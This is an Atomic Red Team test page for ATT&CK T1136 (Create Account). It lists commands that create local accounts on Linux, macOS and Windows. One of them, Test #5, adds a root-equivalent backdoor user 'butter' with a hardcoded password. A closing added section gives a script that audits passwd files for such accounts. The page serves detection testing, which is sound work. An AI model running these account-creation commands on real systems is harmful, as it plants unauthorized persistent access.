atomic-red-team/atomics/T1136/T1136.md
2019-10-24 17:09:43 +00:00

# T1136 - Create Account
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1136)
<blockquote>Adversaries with a sufficient level of access may create a local system, domain, or cloud tenant account. Such accounts may be used for persistence that does not require persistent remote access tools to be deployed on the system.
In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.
### Windows
The <code>net user</code> commands can be used to create a local or domain account.
### Office 365
An adversary with access to a Global Admin account can create another account and assign it the Global Admin role for persistent access to the Office 365 tenant.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)</blockquote>
## Atomic Tests
- [Atomic Test #1 - Create a user account on a Linux system](#atomic-test-1---create-a-user-account-on-a-linux-system)
- [Atomic Test #2 - Create a user account on a MacOS system](#atomic-test-2---create-a-user-account-on-a-macos-system)
- [Atomic Test #3 - Create a new user in a command prompt](#atomic-test-3---create-a-new-user-in-a-command-prompt)
- [Atomic Test #4 - Create a new user in PowerShell](#atomic-test-4---create-a-new-user-in-powershell)
- [Atomic Test #5 - Create a new user in Linux with `root` UID and GID.](#atomic-test-5---create-a-new-user-in-linux-with-root-uid-and-gid)
<br/>
## Atomic Test #1 - Create a user account on a Linux system
Create a user via useradd
**Supported Platforms:** Linux
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Username of the user to create | String | evil_user|
| comment | Comment to record when creating the user | String | Evil Account|
#### Run it with `bash`!
```
useradd -M -N -r -s /bin/bash -c "#{comment}" #{username}
```
<br/>
<br/>
## Atomic Test #2 - Create a user account on a MacOS system
Creates a user on a MacOS system with dscl
**Supported Platforms:** macOS
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Username of the user to create | String | evil_user|
| realname | 'realname' to record when creating the user | String | Evil Account|
#### Run it with `bash`!
```
dscl . -create /Users/#{username}
dscl . -create /Users/#{username} UserShell /bin/bash
dscl . -create /Users/#{username} RealName "#{realname}"
dscl . -create /Users/#{username} UniqueID "1010"
dscl . -create /Users/#{username} PrimaryGroupID 80
dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username}
```
<br/>
<br/>
## Atomic Test #3 - Create a new user in a command prompt
Creates a new user in a command prompt
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Username of the user to create | String | Evil Account|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
```
net user /add "#{username}"
```
<br/>
<br/>
## Atomic Test #4 - Create a new user in PowerShell
Creates a new user in PowerShell
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Username of the user to create | String | Evil Account|
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
New-LocalUser -Name "#{username}" -NoPassword
```
<br/>
<br/>
## Atomic Test #5 - Create a new user in Linux with `root` UID and GID.
Creates a new user in Linux and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign.
**Supported Platforms:** Linux
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Username of the user to create | String | butter|
| password | Password of the user to create | String | BetterWithButter|
#### Run it with `bash`!
```
useradd -o -u 0 -g 0 -M -d /root -s /bin/bash #{username}
echo "#{password}" | passwd --stdin #{username}
```
<br/>
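
A defensive check for what Atomic Test #5 leaves on disk, added here as an example and not part of Atomic Red Team: it scans a passwd(5)-format file for non-root accounts with UID 0 and for UIDs shared by several accounts (the result of `useradd -o`). The function names `audit_passwd` and `make_sample_passwd` and the sample entries are constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example (not Atomic Red Team code): audit a passwd(5)-format file
# for the account artifacts created by Atomic Test #5.

# audit_passwd FILE   (FILE defaults to /etc/passwd; "-" reads stdin)
# Prints one finding per line:
#   UID0_NON_ROOT <name>          account other than "root" that has UID 0
#   DUPLICATE_UID <uid> <names>   UID shared by several accounts (useradd -o)
audit_passwd() {
    awk -F: '
        /^[ \t]*(#|$)/ { next }     # skip comments and blank lines
        NF < 7         { next }     # skip malformed entries
        {
            if ($3 == 0 && $1 != "root") print "UID0_NON_ROOT " $1
            names[$3] = (names[$3] == "" ? $1 : names[$3] "," $1)
            count[$3]++
        }
        END {
            for (uid in count)
                if (count[uid] > 1) print "DUPLICATE_UID " uid " " names[uid]
        }
    ' "${1:-/etc/passwd}"
}

# Constructed sample: a small passwd file after Test #5 ran with its defaults.
make_sample_passwd() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
butter:x:0:0::/root:/bin/bash
EOF
}

# Run the audit over the constructed sample.
make_sample_passwd | audit_passwd -
```

Call `audit_passwd` with no argument to check the live `/etc/passwd`; an empty result means neither condition was found.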